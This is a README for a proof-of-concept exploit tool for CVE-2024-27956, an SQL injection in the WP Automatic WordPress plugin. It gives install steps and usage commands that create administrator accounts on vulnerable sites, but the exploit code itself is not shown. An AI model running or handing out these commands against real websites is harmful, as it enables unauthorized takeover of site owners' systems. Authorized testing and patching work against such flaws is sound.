## https://sploitus.com/exploit?id=F710B711-62F2-5D59-9A44-84A7FC2E966E
# WP Automatic Plugin SQL Injection Exploit (CVE-2024-27956)
A proof-of-concept exploit for the SQL injection vulnerability in WP Automatic plugin (CVE-2024-27956) affecting WordPress sites.
## ๐ Description
This exploit targets a critical unauthenticated SQL injection vulnerability in the WP Automatic plugin (versions < 3.9.2.0) for WordPress. The vulnerability allows attackers to create administrative users and gain full control of vulnerable websites.
## ๐ Features
- Automated vulnerability verification
- Admin user creation with configurable credentials
- Automatic strong password generation
- Clean command-line interface
## ๐ ๏ธ Installation
```bash
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
```
## ๐ป Usage
### Basic exploitation:
```bash
python3 exploit.py http://vulnerable-site.com
```
### Custom username and password:
```bash
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
```
### Using a proxy:
```bash
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
```
## ๐ Options
```
positional arguments:
url Target WordPress URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username for the new admin account
-p PASSWORD, --password PASSWORD
Password for the new admin account
```
## โ ๏ธ Legal Disclaimer
This tool is provided for **educational and authorized penetration testing purposes only**. The developer is not responsible for any misuse of this software. Always obtain proper authorization before testing any systems.
## ๐ License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
## ๐ References
- [CVE-2024-27956 Details](https://nvd.nist.gov/vuln/detail/CVE-2024-27956)
- [WP Automatic Plugin](https://wordpress.org/plugins/wp-automatic/)
- [WordPress Security Advisory](https://wordpress.org/news/category/security/)
```